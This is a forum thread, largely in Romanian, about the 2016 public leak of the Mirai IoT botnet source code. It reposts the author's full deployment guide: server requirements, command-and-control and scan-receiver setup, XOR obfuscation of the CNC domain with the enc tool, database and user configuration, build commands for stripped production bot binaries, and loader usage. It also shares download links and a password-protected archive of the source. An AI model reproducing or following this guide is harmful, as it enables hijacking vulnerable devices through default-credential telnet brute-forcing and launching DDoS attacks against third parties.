Source Code for IoT Botnet ‘Mirai’ Released

[QuoVadis]

The source code that powers the “Internet of Things” (IoT) botnet responsible for launching the historically large distributed denial-of-service (DDoS) attack against KrebsOnSecurity last month has been publicly released, virtually guaranteeing that the Internet will soon be flooded with attacks from many new botnets powered by insecure routers, IP cameras, digital video recorders and other easily hackable devices.

 

The leak of the source code was announced Friday on the English-language hacking community Hackforums. The malware, dubbed “Mirai,” spreads to vulnerable devices by continuously scanning the Internet for IoT systems protected by factory default or hard-coded usernames and passwords.

 

Full article: https://krebsonsecurity.com/2016/10/source-code-for-iot-botnet-mirai-released/

[Silviu]

Aparent cineva a pus sursa si pe Git: https://github.com/jgamblin/Mirai-Source-Code

[adyshake]

Deci cele mai vulnerabele sunt routerele (wireless) ? Care sunt metodele de protectie ?

[Taaz]

https://hackforums.net/showthread.php?tid=5420472

postul original

[Technetium]

Requirements

Quote

 

Bare Minimum
2 servers: 1 for CNC + mysql, 1 for scan receiver, and 1+ for loading

Pro Setup
2 VPS and 4 servers
- 1 VPS with extremely bulletproof host for database server
- 1 VPS, rootkitted, for scanReceiver and distributor
- 1 server for CNC (used like 2% CPU with 400k bots)
- 3x 10gbps NForce servers for loading (distributor distributes to 3 servers equally)

 

Infrastructure Overview

Quote

 

- To establish connection to CNC, bots resolve a domain (resolv.c/resolv.h) and connect to that IP address
- Bots brute telnet using an advanced SYN scanner that is around 80x faster than the one in qbot, and uses almost 20x less resources. When finding bruted result, bot resolves another domain and reports it. This is chained to a separate server to automatically load onto devices as results come in.
- Bruted results are sent by default on port 48101. The utility called scanListen.go in tools is used to receive bruted results (I was getting around 500 bruted results per second at peak). If you build in debug mode, you should see the utitlity scanListen binary appear in debug folder.

Mirai uses a spreading mechanism similar to self-rep, but what I call "real-time-load". Basically, bots brute results, send it to a server listening with scanListen utility, which sends the results to the loader. This loop (brute -> scanListen -> load -> brute) is known as real time loading.

The loader can be configured to use multiple IP address to bypass port exhaustion in linux (there are limited number of ports available, which means that there is not enough variation in tuple to get more than 65k simultaneous outbound connections - in theory, this value lot less). I would have maybe 60k - 70k simultaneous outbound connections (simultaneous loading) spread out across 5 IPs.

 

Configuring Bot
Bot has several configuration options that are obfuscated in (table.c/table.h). In ./mirai/bot/table.h you can find most descriptions for configuration options. However, in ./mirai/bot/table.c there are a few options you *need* to change to get working.

- TABLE_CNC_DOMAIN - Domain name of CNC to connect to - DDoS avoidance very fun with mirai, people try to hit my CNC but I update it faster than they can find new IPs, lol. Retards
- TABLE_CNC_PORT - Port to connect to, its set to 23 already
- TABLE_SCAN_CB_DOMAIN - When finding bruted results, this domain it is reported to
- TABLE_SCAN_CB_PORT - Port to connect to for bruted results, it is set to 48101 already.

In ./mirai/tools you will find something called enc.c - You must compile this to output things to put in the table.c file

Run this inside mirai directory:

./build.sh debug telnet

You will get some errors related to cross-compilers not being there if you have not configured them. This is ok, won't affect compiling the enc tool

Now, in the ./mirai/debug folder you should see a compiled binary called enc. For example, to get obfuscated string for domain name for bots to connect to, use this:

./debug/enc string fuck.the.police.com

The output should look like this:
XOR'ing 20 bytes of data...
\x44\x57\x41\x49\x0C\x56\x4A\x47\x0C\x52\x4D\x4E\x4B\x41\x47\x0C\x41\x4D\x4F\x22

To update the TABLE_CNC_DOMAIN value for example, replace that long hex string with the one provided by enc tool. Also, you see "XOR'ing 20 bytes of data". This value must replace the last argument as well. So for example, the table.c line originally looks like this:

add_entry(TABLE_CNC_DOMAIN, "\x41\x4C\x41\x0C\x41\x4A\x43\x4C\x45\x47\x4F\x47\x0C\x41\x4D\x4F\x22", 30); // cnc.changeme.com

Now that we know value from enc tool, we update it like this:

add_entry(TABLE_CNC_DOMAIN, "\x44\x57\x41\x49\x0C\x56\x4A\x47\x0C\x52\x4D\x4E\x4B\x41\x47\x0C\x41\x4D\x4F\x22", 20); // fuck.the.police.com

Some values are strings, some are port (uint16 in network order / big endian).

Configuring CNC

apt-get install mysql-server mysql-client

CNC requires database to work. When you install database, go into it and run following commands:
http://pastebin.com/86d0iL9g

This will create database for you. To add your user:

INSERT INTO users VALUES (NULL, 'anna-senpai', 'myawesomepassword', 0, 0, 0, 0, -1, 1, 30, '');

Now, go into file ./mirai/cnc/main.go
Edit these values:

const DatabaseAddr string   = "127.0.0.1"
const DatabaseUser string   = "root"
const DatabasePass string   = "password"
const DatabaseTable string  = "mirai"

To the information for the mysql server you just installed.

Setting Up Cross Compilers
Cross compilers are easy, follow the instructions at this link to set up. You must restart your system or reload .bashrc file for these changes to take effect.

http://pastebin.com/1rRCc3aD

Building CNC+Bot
The CNC, bot, and related tools:
1) http://santasbigcandycane.cx/mirai.src.zip
2) http://santasbigcandycane.cx/loader.src.zip

 

How to build bot + CNC
In mirai folder, there is build.sh script.

./build.sh debug telnet

Will output debug binaries of bot that will not daemonize and print out info about if it can connect to CNC, etc, status of floods, etc. Compiles to ./mirai/debug folder

./build.sh release telnet

Will output production-ready binaries of bot that are extremely stripped, small (about 60K) that should be loaded onto devices. Compiles all binaries in format: "mirai.$ARCH" to ./mirai/release folder

Building Echo Loader
Loader reads telnet entries from STDIN in following format:
ip:port user:pass

It detects if there is wget or tftp, and tries to download the binary using that. If not, it will echoload a tiny binary (about 1kb) that will suffice as wget. You can find code to compile the tiny downloader stub here:
http://santasbigcandycane.cx/dlr.src.zip

You need to edit your main.c for the dlr to include the HTTP server IP. The idea is, if the iot device doesn have tftp or wget, then it will echo load this 2kb binary, which download the real binary, since echo loading really slow.
When you compile, place your dlr.* files into the folder ./bins for the loader

./build.sh

Will build the loader, optimized, production use, no fuss. If you have a file in formats used for loading, you can do this:

cat file.txt | ./loader

 

E mai usor asa pentru cei ce nu au cont pe hackforums, nu vor sau nu pot sa intre.

[Taaz]

folositi webarchive daca vreti fisierele originale, deoarece site-ul nu mai merge

1) http://santasbigcandycane.cx/mirai.src.zip
2) http://santasbigcandycane.cx/loader.src.zip

[Technetium]

On 10/5/2016 at 0:45 PM, Taaz said:

folositi webarchive daca vreti fisierele originale, deoarece site-ul nu mai merge

1) http://santasbigcandycane.cx/mirai.src.zip
2) http://santasbigcandycane.cx/loader.src.zip

 

Cine le vrea, pm.

 

@abraxyss si alti doritori:

https://www.sendspace.com/file/arxwm2

RAR5, pass - Basescu: cnN0Zm9ydW1z

Edited October 8, 2016 by Technetium

[cretu_dan]

https://threatpost.com/windows-botnet-spreading-mirai-variant/123805/